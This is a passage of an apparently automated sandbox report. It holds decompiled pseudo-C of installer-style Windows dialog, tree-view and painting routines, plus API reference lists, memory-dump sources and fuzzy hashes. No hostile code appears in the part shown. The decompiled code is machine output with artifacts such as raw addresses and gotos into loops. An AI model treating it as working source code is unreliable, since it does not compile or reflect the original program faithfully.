                                                            								SendMessageA(_v8, 0x200, 0, 0);
                                                            							}
                                                            							if(_a8 == 0x40b) {
                                                            								_t230 =  *0x43c074;
                                                            								if(_t230 != 0) {
                                                            									ImageList_Destroy(_t230);
                                                            								}
                                                            								_t231 =  *0x43c088;
                                                            								if(_t231 != 0) {
                                                            									GlobalFree(_t231);
                                                            								}
                                                            								 *0x43c074 = 0;
                                                            								 *0x43c088 = 0;
                                                            								 *0x452480 = 0;
                                                            							}
                                                            							if(_a8 != 0x40f) {
                                                            								L90:
                                                            								if(_a8 == 0x420 && ( *0x452439 & 0x00000001) != 0) {
                                                            									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                            									ShowWindow(_v8, _t321);
                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                            								}
                                                            								goto L93;
                                                            							} else {
                                                            								E004011EF(_t298, 0, 0);
                                                            								_t203 = _a12;
                                                            								if(_t203 != 0) {
                                                            									if(_t203 != 0xffffffff) {
                                                            										_t203 = _t203 - 1;
                                                            									}
                                                            									_push(_t203);
                                                            									_push(8);
                                                            									E00404CA7();
                                                            								}
                                                            								if(_a16 == 0) {
                                                            									L75:
                                                            									E004011EF(_t298, 0, 0);
                                                            									_v36 =  *0x43c088;
                                                            									_t206 =  *0x452448;
                                                            									_v64 = 0xf030;
                                                            									_v24 = 0;
                                                            									if( *0x45244c <= 0) {
                                                            										L86:
                                                            										if( *0x4524de == 0x400) {
                                                            											InvalidateRect(_v8, 0, 1);
                                                            										}
                                                            										if( *((intOrPtr*)( *0x44e3fc + 0x10)) != 0) {
                                                            											E00404BE2(0x3ff, 0xfffffffb, E00404BFA(5));
                                                            										}
                                                            										goto L90;
                                                            									}
                                                            									_t322 = _t206 + 8;
                                                            									do {
                                                            										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                            										if(_t212 != 0) {
                                                            											_t300 =  *_t322;
                                                            											_v72 = _t212;
                                                            											_v76 = 8;
                                                            											if((_t300 & 0x00000001) != 0) {
                                                            												_v76 = 9;
                                                            												_v60 =  &(_t322[4]);
                                                            												_t322[0] = _t322[0] & 0x000000fe;
                                                            											}
                                                            											if((_t300 & 0x00000040) == 0) {
                                                            												_t216 = (_t300 & 0x00000001) + 1;
                                                            												if((_t300 & 0x00000010) != 0) {
                                                            													_t216 = _t216 + 3;
                                                            												}
                                                            											} else {
                                                            												_t216 = 3;
                                                            											}
                                                            											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                            											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                            											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                            										}
                                                            										_v24 = _v24 + 1;
                                                            										_t322 =  &(_t322[0x806]);
                                                            									} while (_v24 <  *0x45244c);
                                                            									goto L86;
                                                            								} else {
                                                            									_t323 = E004012E2( *0x43c088);
                                                            									E00401299(_t323);
                                                            									_t227 = 0;
                                                            									_t298 = 0;
                                                            									if(_t323 <= 0) {
                                                            										L74:
                                                            										SendMessageA(_v12, 0x14e, _t298, 0);
                                                            										_a16 = _t323;
                                                            										_a8 = 0x420;
                                                            										goto L75;
                                                            									} else {
                                                            										goto L71;
                                                            									}
                                                            									do {
                                                            										L71:
                                                            										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                            											_t298 = _t298 + 1;
                                                            										}
                                                            										_t227 = _t227 + 1;
                                                            									} while (_t227 < _t323);
                                                            									goto L74;
                                                            								}
                                                            							}
                                                            						}
                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                            							goto L93;
                                                            						} else {
                                                            							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                            							if(_t237 == 0xffffffff) {
                                                            								goto L93;
                                                            							}
                                                            							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                            							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                            								_t324 = 0x20;
                                                            							}
                                                            							E00401299(_t324);
                                                            							SendMessageA(_a4, 0x420, 0, _t324);
                                                            							_a12 = _a12 | 0xffffffff;
                                                            							_a16 = 0;
                                                            							_a8 = 0x40f;
                                                            							goto L56;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_v36 = 0;
                                                            					 *0x452480 = _a4;
                                                            					_v20 = 2;
                                                            					 *0x43c088 = GlobalAlloc(0x40,  *0x45244c << 2);
                                                            					_t264 = LoadImageA( *0x452420, 0x6e, 0, 0, 0, 0);
                                                            					 *0x43c07c =  *0x43c07c | 0xffffffff;
                                                            					_v16 = _t264;
                                                            					 *0x43c084 = SetWindowLongA(_v8, 0xfffffffc, E004052EC);
                                                            					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
                                                            					 *0x43c074 = _t266;
                                                            					ImageList_AddMasked(_t266, _v16, 0xff00ff);
                                                            					SendMessageA(_v8, 0x1109, 2,  *0x43c074);
                                                            					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
                                                            						SendMessageA(_v8, 0x111b, _t320, 0);
                                                            					}
                                                            					DeleteObject(_v16);
                                                            					_t327 = 0;
                                                            					do {
                                                            						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
                                                            						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
                                                            							if(_t327 != 0x20) {
                                                            								_v20 = 0;
                                                            							}
                                                            							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062EA(0, _t327, _t331, 0, _t272)), _t327);
                                                            						}
                                                            						_t327 = _t327 + 1;
                                                            					} while (_t327 < 0x21);
                                                            					_t328 = _a16;
                                                            					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
                                                            					_push(0x15);
                                                            					E004042D4(_a4);
                                                            					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
                                                            					_push(0x16);
                                                            					E004042D4(_a4);
                                                            					_t329 = 0;
                                                            					_v16 = 0;
                                                            					if( *0x45244c <= 0) {
                                                            						L19:
                                                            						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                            						goto L20;
                                                            					} else {
                                                            						_t316 = _v24 + 8;
                                                            						_v32 = _t316;
                                                            						do {
                                                            							_t284 =  &(_t316[0x10]);
                                                            							if( *_t284 != 0) {
                                                            								_v64 = _t284;
                                                            								_t285 =  *_t316;
                                                            								_v88 = _v16;
                                                            								_t308 = 0x20;
                                                            								_v84 = 0xffff0002;
                                                            								_v80 = 0xd;
                                                            								_v68 = _t308;
                                                            								_v44 = _t329;
                                                            								_v72 = _t285 & _t308;
                                                            								if((_t285 & 0x00000002) == 0) {
                                                            									if((_t285 & 0x00000004) == 0) {
                                                            										 *( *0x43c088 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                            									} else {
                                                            										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
                                                            									}
                                                            								} else {
                                                            									_v80 = 0x4d;
                                                            									_v48 = 1;
                                                            									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
                                                            									_v36 = 1;
                                                            									 *( *0x43c088 + _t329 * 4) = _t290;
                                                            									_v16 =  *( *0x43c088 + _t329 * 4);
                                                            								}
                                                            							}
                                                            							_t329 = _t329 + 1;
                                                            							_t316 =  &(_v32[0x2018]);
                                                            							_v32 = _t316;
                                                            						} while (_t329 <  *0x45244c);
                                                            						if(_v36 != 0) {
                                                            							L20:
                                                            							if(_v20 != 0) {
                                                            								E00404309(_v8);
                                                            								goto L23;
                                                            							} else {
                                                            								ShowWindow(_v12, 5);
                                                            								E00404309(_v12);
                                                            								L93:
                                                            								return E0040433B(_a8, _a12, _a16);
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            			}

























































                                                            0x0040524a
                                                            0x0040524c
                                                            0x0040524f
                                                            0x00405258
                                                            0x00000000
                                                            0x0040515f
                                                            0x0040516a
                                                            0x0040516d
                                                            0x00405172
                                                            0x00405174
                                                            0x00405178
                                                            0x00405188
                                                            0x00405192
                                                            0x00405194
                                                            0x00405197
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040517a
                                                            0x0040517a
                                                            0x00405180
                                                            0x00405182
                                                            0x00405182
                                                            0x00405183
                                                            0x00405184
                                                            0x00000000
                                                            0x0040517a
                                                            0x0040515d
                                                            0x00405138
                                                            0x0040507b
                                                            0x00000000
                                                            0x00405091
                                                            0x0040509b
                                                            0x004050a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004050b2
                                                            0x004050b7
                                                            0x004050c3
                                                            0x004050c3
                                                            0x004050c5
                                                            0x004050d4
                                                            0x004050d6
                                                            0x004050da
                                                            0x004050dd
                                                            0x00000000
                                                            0x004050dd
                                                            0x0040507b
                                                            0x00404d2f
                                                            0x00404d32
                                                            0x00404d35
                                                            0x00404d45
                                                            0x00404d58
                                                            0x00404d63
                                                            0x00404d69
                                                            0x00404d77
                                                            0x00404d8a
                                                            0x00404d8f
                                                            0x00404d9a
                                                            0x00404da3
                                                            0x00404db9
                                                            0x00404dc9
                                                            0x00404dd5
                                                            0x00404dd5
                                                            0x00404dda
                                                            0x00404de0
                                                            0x00404de2
                                                            0x00404de5
                                                            0x00404dea
                                                            0x00404def
                                                            0x00404df1
                                                            0x00404df1
                                                            0x00404e11
                                                            0x00404e11
                                                            0x00404e13
                                                            0x00404e14
                                                            0x00404e19
                                                            0x00404e1f
                                                            0x00404e23
                                                            0x00404e28
                                                            0x00404e30
                                                            0x00404e34
                                                            0x00404e39
                                                            0x00404e3e
                                                            0x00404e46
                                                            0x00404e49
                                                            0x00404f18
                                                            0x00404f2b
                                                            0x00000000
                                                            0x00404e4f
                                                            0x00404e52
                                                            0x00404e55
                                                            0x00404e58
                                                            0x00404e58
                                                            0x00404e5d
                                                            0x00404e66
                                                            0x00404e69
                                                            0x00404e6d
                                                            0x00404e70
                                                            0x00404e73
                                                            0x00404e7c
                                                            0x00404e85
                                                            0x00404e88
                                                            0x00404e8b
                                                            0x00404e8e
                                                            0x00404ecc
                                                            0x00404ef7
                                                            0x00404ece
                                                            0x00404edd
                                                            0x00404edd
                                                            0x00404e90
                                                            0x00404e93
                                                            0x00404ea1
                                                            0x00404eab
                                                            0x00404eb3
                                                            0x00404eba
                                                            0x00404ec5
                                                            0x00404ec5
                                                            0x00404e8e
                                                            0x00404efd
                                                            0x00404efe
                                                            0x00404f0a
                                                            0x00404f0a
                                                            0x00404f16
                                                            0x00404f31
                                                            0x00404f34
                                                            0x00404f51
                                                            0x00000000
                                                            0x00404f36
                                                            0x00404f3b
                                                            0x00404f44
                                                            0x004052d7
                                                            0x004052e9
                                                            0x004052e9
                                                            0x00404f34
                                                            0x00000000
                                                            0x00404f16
                                                            0x00404e49

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404CF0
                                                            • GetDlgItem.USER32(?,00000408), ref: 00404CFD
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D4C
                                                            • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D63
                                                            • SetWindowLongA.USER32(?,000000FC,004052EC), ref: 00404D7D
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8F
                                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA3
                                                            • SendMessageA.USER32 ref: 00404DB9
                                                            • SendMessageA.USER32 ref: 00404DC5
                                                            • SendMessageA.USER32 ref: 00404DD5
                                                            • DeleteObject.GDI32(00000110), ref: 00404DDA
                                                            • SendMessageA.USER32 ref: 00404E05
                                                            • SendMessageA.USER32 ref: 00404E11
                                                            • SendMessageA.USER32 ref: 00404EAB
                                                            • SendMessageA.USER32 ref: 00404EDB
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • SendMessageA.USER32 ref: 00404EEF
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404F1D
                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F2B
                                                            • ShowWindow.USER32(?,00000005), ref: 00404F3B
                                                            • SendMessageA.USER32 ref: 00405036
                                                            • SendMessageA.USER32 ref: 0040509B
                                                            • SendMessageA.USER32 ref: 004050B0
                                                            • SendMessageA.USER32 ref: 004050D4
                                                            • SendMessageA.USER32 ref: 004050F4
                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405109
                                                            • GlobalFree.KERNEL32(?), ref: 00405119
                                                            • SendMessageA.USER32 ref: 00405192
                                                            • SendMessageA.USER32 ref: 0040523B
                                                            • SendMessageA.USER32 ref: 0040524A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405275
                                                            • ShowWindow.USER32(?,00000000), ref: 004052C3
                                                            • GetDlgItem.USER32(?,000003FE), ref: 004052CE
                                                            • ShowWindow.USER32(00000000), ref: 004052D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 2564846305-813528018
                                                            • Opcode ID: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction ID: 1a89480aaa14410690893e3e2f323560a6be9801fb1e0a4c64b47d85f3ee2a2e
                                                            • Opcode Fuzzy Hash: 722e34d199a2cc1df1e11776506d2daa6a38aa26af04167630ed6e88af3af4de
                                                            • Instruction Fuzzy Hash: A90268B0900209EFEB149FA4CD85AAE7BB5FB45314F14817AF614BA2E1C7788E41DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E0040443F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                            				intOrPtr _v8;
                                                            				signed int _v12;
                                                            				void* _v16;
                                                            				struct HWND__* _t52;
                                                            				long _t86;
                                                            				int _t98;
                                                            				struct HWND__* _t99;
                                                            				signed int _t100;
                                                            				intOrPtr _t103;
                                                            				intOrPtr _t109;
                                                            				int _t110;
                                                            				signed int* _t112;
                                                            				signed int _t113;
                                                            				char* _t114;
                                                            				CHAR* _t115;
                                                            
                                                            				if(_a8 != 0x110) {
                                                            					if(_a8 != 0x111) {
                                                            						L11:
                                                            						if(_a8 != 0x4e) {
                                                            							if(_a8 == 0x40b) {
                                                            								 *0x43405c =  *0x43405c + 1;
                                                            							}
                                                            							L25:
                                                            							_t110 = _a16;
                                                            							L26:
                                                            							return E0040433B(_a8, _a12, _t110);
                                                            						}
                                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                                            						_t110 = _a16;
                                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                            							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                            							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                            							_v12 = _t100;
                                                            							_v16 = _t109;
                                                            							_v8 = 0x44a3c0;
                                                            							if(_t100 - _t109 < 0x4000) {
                                                            								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                            								SetCursor(LoadCursorA(0, 0x7f02));
                                                            								_push(1);
                                                            								E004046E3(_a4, _v8);
                                                            								SetCursor(LoadCursorA(0, 0x7f00));
                                                            								_t110 = _a16;
                                                            							}
                                                            						}
                                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                            							goto L26;
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                            								SendMessageA( *0x452428, 0x111, 1, 0);
                                                            							}
                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                            								SendMessageA( *0x452428, 0x10, 0, 0);
                                                            							}
                                                            							return 1;
                                                            						}
                                                            					}
                                                            					if(_a12 >> 0x10 != 0 ||  *0x43405c != 0) {
                                                            						goto L25;
                                                            					} else {
                                                            						_t103 =  *0x438068; // 0x601114
                                                            						_t25 = _t103 + 0x14; // 0x601128
                                                            						_t112 = _t25;
                                                            						if(( *_t112 & 0x00000020) == 0) {
                                                            							goto L25;
                                                            						}
                                                            						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                            						E004042F6(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                            						E004046BF();
                                                            						goto L11;
                                                            					}
                                                            				}
                                                            				_t98 = _a16;
                                                            				_t113 =  *(_t98 + 0x30);
                                                            				if(_t113 < 0) {
                                                            					_t113 =  *( *0x44e3fc - 4 + _t113 * 4);
                                                            				}
                                                            				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                            				_t114 = _t113 +  *0x452458;
                                                            				_push(0x22);
                                                            				_a16 =  *_t114;
                                                            				_v12 = _v12 & 0x00000000;
                                                            				_t115 = _t114 + 1;
                                                            				_v16 = _t115;
                                                            				_v8 = E0040440A;
                                                            				E004042D4(_a4);
                                                            				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                            				_push(0x23);
                                                            				E004042D4(_a4);
                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                            				E004042F6( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                            				_t99 = GetDlgItem(_a4, 0x3e8);
                                                            				E00404309(_t99);
                                                            				SendMessageA(_t99, 0x45b, 1, 0);
                                                            				_t86 =  *( *0x452430 + 0x68);
                                                            				if(_t86 < 0) {
                                                            					_t86 = GetSysColor( ~_t86);
                                                            				}
                                                            				SendMessageA(_t99, 0x443, 0, _t86);
                                                            				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                            				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                            				 *0x43405c = 0;
                                                            				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                            				 *0x43405c = 0;
                                                            				return 0;
                                                            			}


















                                                            0x00404478
                                                            0x0040447a
                                                            0x0040447f
                                                            0x00404488
                                                            0x0040448e
                                                            0x0040449a
                                                            0x0040449d
                                                            0x004044a6
                                                            0x004044ab
                                                            0x004044ae
                                                            0x004044b3
                                                            0x004044ca
                                                            0x004044d1
                                                            0x004044e4
                                                            0x004044e7
                                                            0x004044fc
                                                            0x00404503
                                                            0x00404508
                                                            0x0040450d
                                                            0x0040450d
                                                            0x0040451c
                                                            0x0040452b
                                                            0x0040453d
                                                            0x00404542
                                                            0x00404552
                                                            0x00404554
                                                            0x00000000

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                            • String ID: D@$Copy failed$N
                                                            • API String ID: 3103080414-1483189110
                                                            • Opcode ID: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction ID: 2bd06c0691c76b957e6ebeae131719b0bc75d5682994f338a7987809ed17278e
                                                            • Opcode Fuzzy Hash: 15772a3c75ca3d8061e8ccc65e3c54641ef039aaa1b6f429936ff2e1fb0ef24c
                                                            • Instruction Fuzzy Hash: A661A1B1A40309BFEB109F61DC45B6A3B68EB85714F10443AFB04BB1D1D7B9A9618F98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				struct tagRECT _v32;
                                                            				struct tagPAINTSTRUCT _v96;
                                                            				struct HDC__* _t70;
                                                            				struct HBRUSH__* _t87;
                                                            				struct HFONT__* _t94;
                                                            				long _t102;
                                                            				signed int _t126;
                                                            				struct HDC__* _t128;
                                                            				intOrPtr _t130;
                                                            
                                                            				if(_a8 == 0xf) {
                                                            					_t130 =  *0x452430;
                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                            					_a8 = _t70;
                                                            					GetClientRect(_a4,  &_v32);
                                                            					_t126 = _v32.bottom;
                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                            					while(_v32.top < _t126) {
                                                            						_a12 = _t126 - _v32.top;
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                            						_v32.bottom = _v32.bottom + 4;
                                                            						_a16 = _t87;
                                                            						FillRect(_a8,  &_v32, _t87);
                                                            						DeleteObject(_a16);
                                                            						_v32.top = _v32.top + 4;
                                                            					}
                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                            						_a16 = _t94;
                                                            						if(_t94 != 0) {
                                                            							_t128 = _a8;
                                                            							_v32.left = 0x10;
                                                            							_v32.top = 8;
                                                            							SetBkMode(_t128, 1);
                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                            							_a8 = SelectObject(_t128, _a16);
                                                            							DrawTextA(_t128, 0x44e420, 0xffffffff,  &_v32, 0x820);
                                                            							SelectObject(_t128, _a8);
                                                            							DeleteObject(_a16);
                                                            						}
                                                            					}
                                                            					EndPaint(_a4,  &_v96);
                                                            					return 0;
                                                            				}
                                                            				_t102 = _a16;
                                                            				if(_a8 == 0x46) {
                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x452428;
                                                            				}
                                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                            			}














                                                            APIs
                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32 ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32 ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextA.USER32(00000000,0044E420,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction ID: 0bd4ef5fed811bbf4bded0a7f85d82f2f783d311ad13c466ed52a022670cf4ac
                                                            • Opcode Fuzzy Hash: e50ea74f15248b3a8d8dcc9d44ab31c14e61b46c1ddd60218d8e11a1e588ca0f
                                                            • Instruction Fuzzy Hash: E7417C71800209AFCF058FA5DE459AFBFB9FF45315F00802AF991AA1A0C774EA55DFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00404766(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				long _v20;
                                                            				long _v24;
                                                            				char _v28;
                                                            				intOrPtr _v32;
                                                            				long _v36;
                                                            				char _v40;
                                                            				unsigned int _v44;
                                                            				signed int _v48;
                                                            				CHAR* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				CHAR* _v72;
                                                            				void _v76;
                                                            				struct HWND__* _v80;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t82;
                                                            				long _t87;
                                                            				signed char* _t89;
                                                            				void* _t95;
                                                            				signed int _t96;
                                                            				int _t109;
                                                            				signed char _t114;
                                                            				signed int _t118;
                                                            				struct HWND__** _t122;
                                                            				intOrPtr* _t138;
                                                            				CHAR* _t146;
                                                            				unsigned int _t150;
                                                            				signed int _t152;
                                                            				unsigned int _t156;
                                                            				signed int _t158;
                                                            				signed int* _t159;
                                                            				signed char* _t160;
                                                            				struct HWND__* _t165;
                                                            				struct HWND__* _t166;
                                                            				int _t168;
                                                            				unsigned int _t197;
                                                            
                                                            				_t156 = __edx;
                                                            				_t82 =  *0x438068; // 0x601114
                                                            				_v32 = _t82;
                                                            				_t146 = ( *(_t82 + 0x3c) << 0xd) + 0x453000;
                                                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                            				if(_a8 == 0x40b) {
                                                            					E00405951(0x3fb, _t146);
                                                            					E00406535(_t146);
                                                            				}
                                                            				_t166 = _a4;
                                                            				if(_a8 != 0x110) {
                                                            					L8:
                                                            					if(_a8 != 0x111) {
                                                            						L20:
                                                            						if(_a8 == 0x40f) {
                                                            							L22:
                                                            							_v8 = _v8 & 0x00000000;
                                                            							_v12 = _v12 & 0x00000000;
                                                            							E00405951(0x3fb, _t146);
                                                            							if(E00405CD7(_t185, _t146) == 0) {
                                                            								_v8 = 1;
                                                            							}
                                                            							E00406257(0x434060, _t146);
                                                            							_t87 = E00406663(1);
                                                            							_v16 = _t87;
                                                            							if(_t87 == 0) {
                                                            								L30:
                                                            								E00406257(0x434060, _t146);
                                                            								_t89 = E00405C82(0x434060);
                                                            								_t158 = 0;
                                                            								if(_t89 != 0) {
                                                            									 *_t89 =  *_t89 & 0x00000000;
                                                            								}
                                                            								if(GetDiskFreeSpaceA(0x434060,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t168 = 0x400;
                                                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                            									asm("cdq");
                                                            									_v48 = _t109;
                                                            									_v44 = _t156;
                                                            									_v12 = 1;
                                                            									goto L36;
                                                            								}
                                                            							} else {
                                                            								_t159 = 0;
                                                            								if(0 == 0x434060) {
                                                            									goto L30;
                                                            								} else {
                                                            									goto L26;
                                                            								}
                                                            								while(1) {
                                                            									L26:
                                                            									_t114 = _v16(0x434060,  &_v48,  &_v28,  &_v40);
                                                            									if(_t114 != 0) {
                                                            										break;
                                                            									}
                                                            									if(_t159 != 0) {
                                                            										 *_t159 =  *_t159 & _t114;
                                                            									}
                                                            									_t160 = E00405C30(0x434060);
                                                            									 *_t160 =  *_t160 & 0x00000000;
                                                            									_t159 = _t160 - 1;
                                                            									 *_t159 = 0x5c;
                                                            									if(_t159 != 0x434060) {
